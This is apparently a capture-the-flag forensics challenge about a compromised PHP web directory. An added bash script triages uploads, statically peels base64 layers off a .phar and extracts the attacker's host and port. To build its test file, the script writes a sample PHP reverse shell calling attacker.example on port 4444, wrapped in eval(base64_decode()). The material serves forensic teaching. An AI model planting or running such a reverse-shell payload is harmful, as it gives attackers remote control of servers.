www_html_dir
Overview
Scenario
A web server hosting a PHP application was compromised. The only recovered artifact is a copy of the /var/www directory. Investigation reveals that the attacker successfully gained remote access and exfiltrated sensitive data. Suspicious files were found inside the uploads/ directory, including a PHP Archive (.phar) file containing heavily obfuscated code.
The goal of the investigation is to analyze the malicious payload and determine the attacker’s connection details used for the reverse shell.
Objective
Analyze the compromised web directory, identify malicious uploaded files, deobfuscate the PHP payload, and extract the attacker’s hostname and port used in the reverse shell connection.
Flag Format: Flag{hostname|port}
Infrastructure: Recovered /var/www web server snapshot
Provided Files: Compromised web directory (var/www dump), www_html_dir.zip
Tools: Linux CLI tools (ls, grep, awk, sort), PHP interpreter, text editor
Flag Format: Flag{hostname|port}
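As an added example that is not part of the challenge files or the intended write-up, the bash script below walks the four objective steps (triage the web directory, flag suspicious uploads, unwrap the payload statically, recover host and port) against a constructed stand-in for the snapshot. The directory layout, the three-layer base64 wrapping, the hostname attacker.example and the port 4444 are all assumptions the script builds for itself; the real .phar is more heavily obfuscated, so the unwrap step is the part you would adapt.

```bash
#!/bin/bash
# Added example, not part of the challenge files: triage a recovered /var/www
# dump, flag executable uploads, peel eval(base64_decode()) layers off a PHP
# payload statically and pull the reverse-shell host and port from the result.
# Everything under $WORK is constructed here; hostname attacker.example, port
# 4444 and the three-layer base64 wrapping are assumptions, not the real artefact.
set -u

WORK="$(mktemp -d)"
WWW="$WORK/var/www"
trap 'rm -rf "$WORK"' EXIT

build_sample_tree() {
    # Constructed stand-in for the snapshot: one benign upload and one .phar
    # whose fsockopen() reverse shell is wrapped in three base64 layers.
    local inner layer n
    mkdir -p "$WWW/html/uploads"
    printf 'GIF89a' > "$WWW/html/uploads/avatar.gif"
    inner='$s=fsockopen("attacker.example",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
    layer="$inner"
    for n in 1 2 3; do
        layer="eval(base64_decode(\"$(printf '%s' "$layer" | base64 | tr -d '\n')\"));"
    done
    printf '<?php %s' "$layer" > "$WWW/html/uploads/image.phar"
}

# Step 1: any file under uploads/ that carries a PHP open tag or one of the
# usual obfuscation wrappers is suspicious, whatever its extension says.
find_suspicious_uploads() {
    grep -rlE '<\?php|eval\(|base64_decode\(|gzinflate\(|str_rot13\(' "$1" 2>/dev/null | sort
}

# Step 2: unwrap nested eval(base64_decode("...")) without ever executing the
# payload. Stops when no wrapper is left or after 20 layers, so a malformed
# or self-referencing file cannot spin forever.
unwrap_payload() {
    local layer i=0
    layer="$(cat "$1")"
    while printf '%s' "$layer" | grep -q 'base64_decode("' && [ "$i" -lt 20 ]; do
        layer="$(printf '%s' "$layer" \
            | sed -n 's#.*base64_decode("\([A-Za-z0-9+/=]*\)").*#\1#p' \
            | base64 -d)"
        i=$((i + 1))
    done
    printf '%s\n' "$layer"
}

# Step 3: extract host|port from fsockopen("host", port) or
# socket_connect($sock, "host", port). Assumes one of these connect calls; a
# payload that splits or encodes the address needs the pattern adjusted.
extract_c2() {
    printf '%s' "$1" \
        | sed -n -E 's/.*(fsockopen|socket_connect)\([^"]*"([^"]+)",[[:space:]]*([0-9]+)\).*/\2|\3/p'
}

# Run the three steps end to end; the caller wraps the result in Flag{}.
run_investigation() {
    local hit plain
    build_sample_tree
    hit="$(find_suspicious_uploads "$WWW/html/uploads" | head -n 1)"
    plain="$(unwrap_payload "$hit")"
    extract_c2 "$plain"
}

printf 'Flag{%s}\n' "$(run_investigation)"
```

The unwrap loop only peels eval(base64_decode()) layers. When a layer uses gzinflate, str_rot13 or a custom decoder, copy the .phar to an isolated machine and run the PHP interpreter over a version in which the final eval( is replaced by echo(, never over the original file, and read each layer before decoding the next so that a staged loader which fetches a second stage is caught rather than executed.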